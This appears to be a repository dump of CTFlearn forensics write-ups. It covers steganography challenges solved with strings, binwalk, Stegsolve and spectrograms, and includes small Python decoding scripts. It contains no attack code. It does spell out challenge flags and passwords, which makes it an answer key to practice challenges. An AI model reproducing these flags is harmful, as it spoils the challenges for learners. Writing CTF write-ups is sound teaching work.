/Forensics/PDF by fdpumyp/dontopen.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/PDF by fdpumyp/dontopen.pdf
--------------------------------------------------------------------------------
/Forensics/Pho Is Tasty!/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Pho Is Tasty!/Flag.png
--------------------------------------------------------------------------------
/Forensics/Pho Is Tasty!/Pho.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Pho Is Tasty!/Pho.jpg
--------------------------------------------------------------------------------
/Forensics/Pho Is Tasty!/README.md:
--------------------------------------------------------------------------------
## Pho Is Tasty!
The main idea for finding the flag is to see the Hex Dump!

#### Step-1:
After I downloaded `Pho.jpg`, I tried using `strings`, `binwalk`, etc. But not much luck.

`strings Pho.jpg` output:
```
oSamsung
Samsung Galaxy S8 Color Palette:
)$,$!$,$A3--3AK?
```

#### Step-3:
Finally the flag becomes:

[comment]: <> (`CTFlearn{I_Love_Pho!!!}`)
--------------------------------------------------------------------------------
/Forensics/PikesPeak/PikesPeak.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/PikesPeak/PikesPeak.jpg
--------------------------------------------------------------------------------
/Forensics/PikesPeak/README.md:
--------------------------------------------------------------------------------
## PikesPeak
The main idea for finding the flag is using simple forensic techniques.

#### Step-1:
After we download `PikesPeak.jpg`, we try to open and see the flag and check if we find any.

#### Step-2:
I tried simple techniques and easily found the answer when we send the command:

`strings PikesPeak.jpg | grep {`

I got this as output:

```
CTFLEARN{PikesPeak}
CTFLearn{Colorado}
%ctflearn{MountainMountainMountain}
#cTfLeArN{CTFMountainCTFmOUNTAIN}
CTF{AsPEN.Vail}
CTFlearn{Gandalf}
ctflearning{AUCKLAND}
ctfLEARN{MtDoom}
6ctflearninglearning{Mordor.TongariroAlpineCrossing}
+CTFLEARN{MountGedePangrangoNationalPark}
$ctflearncTfLeARN{MountKosciuszko}
{rof
#&f{
Y\GC{(
{r%681G
{t(@Q
{5$<
)%)`{
N{eI&
]N&{
NKxf{
K;{Dk
8pGM{
d=q{
|PV{
xw{1
#{;W
}s7h{
V{K[\d
b%\{%
```

#### Step-4:

I tried all the flags up there xP.
53 |
54 | However, one of them worked out.
55 |
56 | #### Step-5:
57 | Finally the flag becomes:
58 |
59 |
60 | [comment]: <> (`CTFlearn{Gandalf}`)
61 |
--------------------------------------------------------------------------------
/Forensics/QR-code inception/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/QR-code inception/flag.png
--------------------------------------------------------------------------------
/Forensics/QR-code inception/flag_qr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/QR-code inception/flag_qr.png
--------------------------------------------------------------------------------
/Forensics/QR-code inception/inception.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/QR-code inception/inception.png
--------------------------------------------------------------------------------
/Forensics/QR-code inception/qr.py:
--------------------------------------------------------------------------------
1 | import base64
2 | import cv2
3 | import numpy as np
4 | import zbar
5 |
6 | # Side length, in pixels, of one QR tile in the grid
7 | scale = 300
8 | scanner = zbar.Scanner()
9 |
10 | def scan(img):
11 |     # Normalise polarity: XOR with the inverse of the corner pixel so that the corner (background) becomes white
12 |     img = np.bitwise_xor(img, ~img[0,0])
13 |     # Enlarge the tile before scanning
14 |     img = cv2.resize(img, (scale * 5, scale * 5), interpolation = cv2.INTER_AREA)
15 |     ret = scanner.scan(img)
16 |     return ret[0].data if ret else b''
17 |
18 | img = cv2.imread('inception.png', cv2.IMREAD_GRAYSCALE)
19 | # shape is (rows, columns), i.e. (height, width)
20 | h, w = img.shape
21 | # Scan the tiles row by row and concatenate their payloads
22 | msg = b''.join([scan(img[y:y+scale, x:x+scale]) for y in range(0, h, scale) for x in range(0, w, scale)])
23 | # msg is bytes, so decode it before concatenating with a str
24 | print("Decoded message: " + msg.decode(errors='replace'))
--------------------------------------------------------------------------------
/Forensics/Rubber Duck/RubberDuck.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Rubber Duck/RubberDuck.jpg
--------------------------------------------------------------------------------
/Forensics/Seeing is believing/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Seeing is believing/Flag.png
--------------------------------------------------------------------------------
/Forensics/Seeing is believing/README.md:
--------------------------------------------------------------------------------
1 | ## Seeing is believing
2 | The main idea for finding the flag is basic stego skills.
3 |
4 | #### Step-1:
5 | After I downloaded `help.me`, I tried `file help.me` on it. I got this:
6 |
7 | ```bash
8 | help.me: Ogg data, Vorbis audio, mono, 44100 Hz, ~110000 bps, created by: Xiph.Org libVorbis
9 | I (1.3.3)
10 | ```
11 | This is an `ogg` format file.
12 | #### Step-2:
13 | So, I just made a copy and changed its extension, giving `help (copy).ogg`.
14 | When I played it, it was nothing but some jitters.
15 |
16 | #### Step-3:
17 | So, I opened it in [Audacity](https://www.audacityteam.org/). Normally, I check the Spectrogram view here.
18 |
19 |
20 |
21 |
22 | #### Step-4:
23 | We clearly got a barcode there. When I scanned it online, I was taken to this URL: https://pastebin.com/zhEhyp3G
24 |
25 |
26 | #### Step-6:
27 | I found the flag there.
28 | 29 | 30 | 31 | #### Step-8: 32 | Finally, the flag becomes: 33 | `the_flag_is{A_sP3c7r0grAm?!}` -------------------------------------------------------------------------------- /Forensics/Seeing is believing/Spectogram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Seeing is believing/Spectogram.png -------------------------------------------------------------------------------- /Forensics/Seeing is believing/message.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Seeing is believing/message.zip -------------------------------------------------------------------------------- /Forensics/Seeing is believing/seeingisbelieving/help (copy).ogg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Seeing is believing/seeingisbelieving/help (copy).ogg -------------------------------------------------------------------------------- /Forensics/Seeing is believing/seeingisbelieving/help.me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Seeing is believing/seeingisbelieving/help.me -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/0 -------------------------------------------------------------------------------- 
/Forensics/ShahOfGimli/Gimli04Base.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/Gimli04Base.jpg -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/ShahOfGimli.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/ShahOfGimli.jpg -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/0 -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/20517.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/20517.tar -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/Gimli04Base.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/Gimli04Base.jpg -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/flag.enc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/flag.enc -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/flag.txt: -------------------------------------------------------------------------------- 1 | CTFlearn{Gimli.Is.A.Warrior} -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/flag.txt: -------------------------------------------------------------------------------- 1 | CTFlearn{Gimli.Is.A.Warrior} -------------------------------------------------------------------------------- /Forensics/Simple Steganography/Minions1.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Simple Steganography/Minions1.jpeg -------------------------------------------------------------------------------- /Forensics/Simple Steganography/raw.txt: -------------------------------------------------------------------------------- 1 | AEMAVABGAGwAZQBhAHIAbgB7AHQAaABpAHMAXwBpAHMAXwBmAHUAbgB9 2 | 3 | -------------------------------------------------------------------------------- /Forensics/Smiling ASCII/ALTERNATIVE.md: -------------------------------------------------------------------------------- 1 | ## Smiling ASCII Alternative Solution 2 | The main idea is to find the flag with Stegsolve. 3 | 4 | #### Step-1: 5 | We are given [`smiling.png`](./smiling.png). 6 | 7 | #### Step-2: 8 | If we look at the image in [Stegsolve](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve), we can see interference in all alpha, blue, and green planes: 9 | 10 | 11 | #### Step-3: 12 | If there's interference that means data can be extracted based on the interference. 
Go to Analyze > Data Extract: 13 | 14 | 15 | #### Step-4: 16 | The flag is: 17 | `CTFlearn{ascii_pixel_flag}` -------------------------------------------------------------------------------- /Forensics/Smiling ASCII/data_extract.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Smiling ASCII/data_extract.png -------------------------------------------------------------------------------- /Forensics/Smiling ASCII/interference.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Smiling ASCII/interference.png -------------------------------------------------------------------------------- /Forensics/Smiling ASCII/smiling.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Smiling ASCII/smiling.png -------------------------------------------------------------------------------- /Forensics/Snowboard/Snowboard.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Snowboard/Snowboard.jpg -------------------------------------------------------------------------------- /Forensics/Snowboard/_Snowboard.jpg.extracted/0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Snowboard/_Snowboard.jpg.extracted/0 -------------------------------------------------------------------------------- /Forensics/Snowboard/_Snowboard.jpg.extracted/393B: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Snowboard/_Snowboard.jpg.extracted/393B
--------------------------------------------------------------------------------
/Forensics/Snowboard/_Snowboard.jpg.extracted/395D:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Snowboard/_Snowboard.jpg.extracted/395D
--------------------------------------------------------------------------------
/Forensics/Snowboard/_Snowboard.jpg.extracted/3A4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Snowboard/_Snowboard.jpg.extracted/3A4
--------------------------------------------------------------------------------
/Forensics/Snowboard/_Snowboard.jpg.extracted/5A:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Snowboard/_Snowboard.jpg.extracted/5A
--------------------------------------------------------------------------------
/Forensics/Taking LS/README.md:
--------------------------------------------------------------------------------
1 | ## Taking LS
2 | The main idea is to find the flag using simple `ls` commands to uncover the hidden password and the flag.
3 |
4 | #### Step-1:
5 | After we download the given zip `The Flag.zip` from the cloud, we just try simple techniques.
6 |
7 | After unzipping it, we get 2 directories named `__MACOSX` & `The Flag`.
8 |
9 | #### Step-2:
10 | I went into the `The Flag` directory and ran the
11 | `ls -al` command to get the following output:
12 | ```
13 | total 40
14 | drwxr-xr-x 3 rishit rishit 4096 Oct 30 2016 .
15 | drwxr-xr-x 4 rishit rishit 4096 Jul 10 16:13 ..
16 | -rw-r--r-- 1 rishit rishit 6148 Oct 30 2016 .DS_Store
17 | -rw-r--r-- 1 rishit rishit 16647 Oct 30 2016 'The Flag.pdf'
18 | drwxr-xr-x 2 rishit rishit 4096 Oct 30 2016 .ThePassword
19 | ```
20 | Note: `The Flag.pdf` is password protected.
21 | We need to retrieve the password.
22 |
23 | #### Step-3:
24 | Next, I went into the `.ThePassword` directory and ran `ls` to get this:
25 |
26 | ```
27 | ThePassword.txt
28 | ```
29 |
30 | #### Step-4:
31 | Let's do a `cat ThePassword.txt` to get the password.
32 |
33 | `Nice Job! The Password is "Im The Flag".`
34 |
35 | #### Step-5:
36 | Let's try this password on `The Flag.pdf`, and it works!
37 |
38 | #### Step-7:
39 | Finally the flag becomes:
40 | `ABCTF{T3Rm1n4l_is_C00l}`
--------------------------------------------------------------------------------
/Forensics/Taking LS/The Flag.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Taking LS/The Flag.zip
--------------------------------------------------------------------------------
/Forensics/Taking LS/The Flag/The Flag.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Taking LS/The Flag/The Flag.pdf
--------------------------------------------------------------------------------
/Forensics/The Data Scientist/README.md:
--------------------------------------------------------------------------------
1 | ## The Data Scientist
2 | The main idea for getting the flag is to use the cv2 and pandas libraries to get the decoded message.
3 |
4 | #### Step-1:
5 |
6 | https://niekgnad.wordpress.com/2020/07/23/ctflearn-solution-the-data-scientist/
7 |
8 | ```python
9 |
10 | import pandas as pd
11 | import cv2
12 | # The real hint will be given when you found what's the columns mean
13 | df = pd.read_csv('the_data_scientist.csv')
14 | # Decode the mean of each column as an ASCII character
15 | print(''.join([chr(int(round(x))) for x in df.mean()]))
16 | # SET ALL VALUES BETWEEN 64 AND 65 TO BLACK AND SCAN IT
17 | # Mask: True (white) outside the 64..65 range, False (black) inside it
18 | df = (df < 64) | (df > 65)
19 | # Write the mask as an 8-bit black/white image (cv2 needs uint8, not the int64 that bool * 255 produces)
20 | cv2.imwrite('flag.png', (df.to_numpy() * 255).astype('uint8'))
21 | ```
22 |
23 | #### Step-2:
24 | Finally, the flag becomes:
25 | `CTFlearn{m4ch1n3_l34rn1n9_rul35}`
--------------------------------------------------------------------------------
/Forensics/The Keymaker/The-Keymaker.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/The Keymaker/The-Keymaker.jpg
--------------------------------------------------------------------------------
/Forensics/The Keymaker/flag:
--------------------------------------------------------------------------------
1 | CTFlearn{Ne0.TheMatrix}
2 |
--------------------------------------------------------------------------------
/Forensics/The Keymaker/flag.enc:
--------------------------------------------------------------------------------
1 | mmtaSHhAsK9pLMepyFDl37UTXQT0CMltZk7+4Kaa1svo5vqb6JuczUqQGFJYiycY
2 |
--------------------------------------------------------------------------------
/Forensics/The adventures of Boris Ivanov. Part 1./Boris_Ivanov_1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/The adventures of Boris Ivanov. Part 1./Boris_Ivanov_1.jpg
--------------------------------------------------------------------------------
/Forensics/The adventures of Boris Ivanov.
Part 1./Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/The adventures of Boris Ivanov. Part 1./Flag.png
--------------------------------------------------------------------------------
/Forensics/The adventures of Boris Ivanov. Part 1./README.md:
--------------------------------------------------------------------------------
1 | ## The adventures of Boris Ivanov. Part 1.
2 | The main idea for finding the flag is to tinker with the image's RGB filters in Stegsolver.
3 |
4 | #### Step-1:
5 | After downloading `Boris_Ivanov_1.jpg` from the cloud, I tried all the basic forensics techniques, but I got nothing.
6 |
7 |
8 |
9 | NULL. NADA. ZIP.
10 |
11 | #### Step-2:
12 |
13 | I tried to use the Stegsolver application. Those who don't have it can get the script from here:
14 |
15 | https://github.com/zardus/ctf-tools/tree/master/stegsolve
16 |
17 | After installation is complete, running `./stegsolver.jar` will launch the application.
18 |
19 | #### Step-3:
20 |
21 | After reading the challenge again and again, we can notice that the word KGB may relate to steganography by RGB.
22 |
23 | In Stegsolver, there are 1000 offsets possible.
24 |
25 | #### Step-4:
26 | Luckily, after analyzing the image, I started to filter backwards and got the flag at offset 898.
27 |
28 | I got the flag there.
29 |
30 |
31 |
32 |
33 | #### Step-5:
34 | Finally the flag becomes:
35 | `flag{d0nt_m3s5_w1th_th3_KGB}`
--------------------------------------------------------------------------------
/Forensics/Tux!/Base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Tux!/Base64.png
--------------------------------------------------------------------------------
/Forensics/Tux!/README.md:
--------------------------------------------------------------------------------
1 | ## Tux!
2 | The main idea is to get the flag using basic stego skills.
3 |
4 | #### Step-1:
5 | After I downloaded `Tux.jpg`, I tried using `strings`, `binwalk`, etc., but without much luck.
6 |
7 |
8 |
9 | `strings Tux.jpg` output:
10 | ```
11 | JFIF
12 | 'ICAgICAgUGFzc3dvcmQ6IExpbnV4MTIzNDUK
13 | ```
14 | #### Step-2:
15 | I got this Base64-encoded string there, which I tried to decode [here](https://www.base64decode.org/).
16 |
17 |
18 |
19 | #### Step-3:
20 | So, next I tried `binwalk Tux.jpg` and got this:
21 | ```bash
22 | DECIMAL HEXADECIMAL DESCRIPTION
23 | --------------------------------------------------------------------------------
24 | 0 0x0 JPEG image data, JFIF standard 1.01
25 | 5488 0x1570 Zip archive data, encrypted at least v1.0 to extract, compressed size: 39, uncompressed size: 27, name: flag
26 | 5679 0x162F End of Zip archive, footer length: 22
27 | ```
28 |
29 | So to unzip the files, I used `binwalk -e Tux.jpg` and got a directory named: `_Tux.jpg.extracted`.
30 | It contained `flag` (encrypted, obviously).
31 |
32 |
33 | #### Step-4:
34 | So, then I used the password `Linux12345`, which we got after decoding the Base64 string.
35 |
36 | Voila! I got the flag.
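Added example (not part of the original writeup): a small parser for the ZIP local file header, which is where the fields in the `binwalk` line above (encryption bit, version needed, sizes, name) come from, together with the decode of the Base64 hint from the `strings` output. The image bytes are constructed to mirror the offset and sizes in that output, and the function names are illustrative.

```python
import base64
import re
import struct

# ZIP local file header: signature, version needed, flags, method, time, date,
# CRC-32, compressed size, uncompressed size, name length, extra length.
LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")
ZIP_SIG = b"PK\x03\x04"


def scan_zip_entries(blob):
    """Locate ZIP local file headers inside arbitrary data and decode them."""
    entries = []
    pos = blob.find(ZIP_SIG)
    while pos != -1 and pos + LOCAL_HDR.size <= len(blob):
        (_sig, version, flags, method, _time, _date, _crc,
         csize, usize, name_len, _extra_len) = LOCAL_HDR.unpack_from(blob, pos)
        name_start = pos + LOCAL_HDR.size
        if name_start + name_len > len(blob):
            break  # truncated header, nothing more to parse
        entries.append({
            "offset": pos,
            "version_needed": "%d.%d" % divmod(version, 10),
            "encrypted": bool(flags & 0x0001),  # general-purpose bit 0
            "method": method,                   # 0 = stored, 8 = deflate
            "compressed_size": csize,
            "uncompressed_size": usize,
            "name": blob[name_start:name_start + name_len].decode("utf-8", "replace"),
        })
        # The signature can also occur by chance inside compressed data,
        # so results past the first header deserve a sanity check.
        pos = blob.find(ZIP_SIG, pos + len(ZIP_SIG))
    return entries


def decode_hint(raw):
    """Drop stray non-Base64 bytes (strings often glues one on), then decode."""
    cleaned = re.sub(r"[^A-Za-z0-9+/=]", "", raw)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned).decode("ascii", "replace").strip()


# Constructed sample: JPEG-like filler up to offset 5488, then a hand-built
# header with the encryption bit set and the sizes binwalk printed, followed
# by 39 placeholder bytes standing in for the encrypted data.
SAMPLE_IMAGE = (
    b"\xff\xd8" + bytes(5484) + b"\xff\xd9"
    + LOCAL_HDR.pack(ZIP_SIG, 10, 0x0001, 0, 0, 0, 0, 39, 27, 4, 0)
    + b"flag" + bytes(39)
)

if __name__ == "__main__":
    for entry in scan_zip_entries(SAMPLE_IMAGE):
        print(entry)
    print(decode_hint("'ICAgICAgUGFzc3dvcmQ6IExpbnV4MTIzNDUK"))
```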
37 | #### Step-5: 38 | Finally the flag becomes: 39 | 40 | [comment]: <> (`CTFlearn{Linux_Is_Awesome}`) 41 | 42 | -------------------------------------------------------------------------------- /Forensics/Tux!/Tux.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Tux!/Tux.jpg -------------------------------------------------------------------------------- /Forensics/Tux!/_Tux.jpg.extracted/1570.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Tux!/_Tux.jpg.extracted/1570.zip -------------------------------------------------------------------------------- /Forensics/Tux!/_Tux.jpg.extracted/flag: -------------------------------------------------------------------------------- 1 | CTFlearn{Linux_Is_Awesome} 2 | -------------------------------------------------------------------------------- /Forensics/Up For A Little Challenge?/Begin Hack.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Up For A Little Challenge?/Begin Hack.jpg -------------------------------------------------------------------------------- /Forensics/Up For A Little Challenge?/Did I Forget Again?/Loo Nothing Becomes Useless ack.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Up For A Little Challenge?/Did I Forget Again?/Loo Nothing Becomes Useless ack.jpg -------------------------------------------------------------------------------- /Forensics/Up For A Little Challenge?/Did I Forget 
Again?/skycoder.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Up For A Little Challenge?/Did I Forget Again?/skycoder.jpg -------------------------------------------------------------------------------- /Forensics/Up For A Little Challenge?/Up For A Little Challenge.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Up For A Little Challenge?/Up For A Little Challenge.zip -------------------------------------------------------------------------------- /Forensics/WOW.... So Meta/3UWLBAUCb9Z2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/WOW.... 
So Meta/3UWLBAUCb9Z2.jpg -------------------------------------------------------------------------------- /Forensics/abandoned place/Hex1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/abandoned place/Hex1.png -------------------------------------------------------------------------------- /Forensics/abandoned place/Hex2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/abandoned place/Hex2.png -------------------------------------------------------------------------------- /Forensics/abandoned place/abondoned_street_challenge2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/abandoned place/abondoned_street_challenge2.jpg -------------------------------------------------------------------------------- /Forensics/abandoned place/abondoned_street_challenge2_altered.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/abandoned place/abondoned_street_challenge2_altered.jpg -------------------------------------------------------------------------------- /Forensics/office flag/flag.odt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/office flag/flag.odt -------------------------------------------------------------------------------- /Forensics/office flag/flag.zip: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/office flag/flag.zip -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Rishit Saiya 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 |
--------------------------------------------------------------------------------
/Miscellaneous/Ambush Mission/Base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Ambush Mission/Base64.png
--------------------------------------------------------------------------------
/Miscellaneous/Ambush Mission/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Ambush Mission/Flag.png
--------------------------------------------------------------------------------
/Miscellaneous/Ambush Mission/README.md:
--------------------------------------------------------------------------------
1 | ## Ambush Mission
2 | The main idea for finding the flag is stego and crypto skills.
3 |
4 | #### Step-1:
5 | After I downloaded `clue.png`, I checked it with basic commands like `strings`, `binwalk`, etc.
6 |
7 |
8 |
9 | #### Step-2:
10 | Now, I used [Stegsolve](https://github.com/zardus/ctf-tools/tree/master/stegsolve) to check for any hints.
11 |
12 | #### Step-3:
13 | Luckily, in Red Plane 0, I got an encoded string: `==QTh9lMx8Fd08VZt9FdFNTb`.
14 |
15 |
16 |
17 | If you have a slight idea of Base64-encoded strings, you know they often end with `=` or `==` padding. This one starts with `==`, so it was clearly reversed.
18 |
19 | #### Step-4:
20 | I reversed it online at: https://codebeautify.org/reverse-string
21 |
22 |
23 |
